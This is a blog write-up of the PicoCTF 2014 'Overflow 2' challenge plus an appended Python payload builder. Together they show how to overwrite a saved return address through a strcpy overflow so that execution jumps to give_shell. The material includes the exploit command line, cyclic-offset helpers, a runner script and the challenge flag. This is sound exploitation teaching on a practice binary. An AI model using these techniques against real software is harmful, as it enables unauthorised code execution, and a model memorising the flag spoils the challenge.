Friday, October 16, 2015

PicoCTF 2014 Overflow 2

I actually had this one, and a few others, solved a while ago. The VM they were stored on got corrupted, so I lost all of those files. Good thing it was a VM and not my host machine that got corrupted. This is how I solved Overflow 2.

This is a C program with a stack buffer overflow: it copies its argument into a 16-byte buffer with strcpy, which never checks the length of what it copies. To exploit it I have to take control of execution by overwriting the saved return address on the stack, so that when the vulnerable function returns it jumps to the give_shell function instead of back to its caller.

First I need the address of give_shell. In the command prompt I found it with objdump -d overflow2 | grep "shell". The -d option of objdump disassembles the program and lists every function; I only care about give_shell, so I pipe the output into grep, which prints only the lines containing the string "shell". The address of give_shell is 080484ad.

Next I need the distance from the start of the buffer to the saved return address. The buffer is 16 bytes. Above it on the stack sits the saved base pointer (4 bytes) and then the return address (4 bytes), which is the saved instruction pointer that gets popped into EIP when the function returns. Just adding those up gives 16 + 4 = 20 bytes of filler before the return address, but the compiler usually leaves alignment padding between the buffer and the saved base pointer, so the real distance has to be confirmed (in gdb, by overflowing with a recognizable pattern and seeing what lands in EIP). For this binary the filler is 32 bytes, followed by the 4 bytes of the address I want the return address to become.

I use Python to generate the input, because I need it to emit raw bytes for the address. The command is: ./overflow2 $(python -c 'print "A"*32 + "\xad\x84\x04\x08"'). The address is written byte-reversed because x86 is little endian, so 0x080484ad is stored in memory as ad 84 04 08. (None of those bytes is a null, which matters: strcpy stops at the first null byte, so an address containing 0x00 could not be copied this way.) Once I run this in the command prompt I get a shell. Then I type cat flag.txt and get the flag, controlling_%eip_feels_great.
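As an added example (not code from the original post), here is a small Python 3 payload builder for the technique above. The give_shell address 0x080484ad and the 32 bytes of filler are taken from the post; the cyclic-pattern helpers are the general way to find that filler length when the frame layout is not known, and the binary path ./overflow2 is assumed.

```python
"""Payload helpers for the overflow2 return-address overwrite.

Added example, not the original post's code. The address and the 32-byte
padding come from the post; cyclic()/cyclic_find() implement the usual
pattern-based offset search and are not specific to this binary.
"""
import string
import struct
import subprocess
import sys

GIVE_SHELL = 0x080484AD  # from `objdump -d overflow2 | grep shell` in the post
PADDING = 32             # bytes of filler before the saved return address on this binary


def p32(value):
    """Pack a 32-bit value little-endian, the byte order x86 keeps on the stack.
    0x080484ad becomes b'\\xad\\x84\\x04\\x08'."""
    return struct.pack("<I", value)


def build_payload(padding=PADDING, target=GIVE_SHELL):
    """Filler up to the saved return address, then the address EIP should become.

    strcpy stops at the first NUL, so a payload containing 0x00 would be
    truncated before the address is copied; refuse it instead of silently failing.
    """
    payload = b"A" * padding + p32(target)
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


def cyclic(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is unique,
    so the 4 bytes that end up in EIP identify their offset in the input."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the pattern's unique range")


def cyclic_find(eip_value, length=256):
    """Offset of the pattern bytes that landed in EIP after a crash.

    eip_value is the register as gdb prints it (an int, e.g. 0x31624130);
    the register holds those 4 bytes little-endian, so repack before searching.
    """
    return cyclic(length).find(p32(eip_value))


def run_exploit(binary="./overflow2"):
    """Run the binary with the payload as argv[1], the same as the shell
    $(python -c ...) invocation in the post but without a shell in between."""
    return subprocess.run([binary, build_payload()], stdin=sys.stdin)


if __name__ == "__main__":
    # Print the payload as raw bytes so it can also be used as:
    #   ./overflow2 "$(python3 this_script.py)"
    sys.stdout.buffer.write(build_payload())
```

cyclic() and cyclic_find() are the usual two-step offset search: run the program with cyclic(64) as its argument under gdb, read EIP at the crash, and cyclic_find() on that value gives the number of bytes that precede the return address, which is the padding to use in build_payload().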
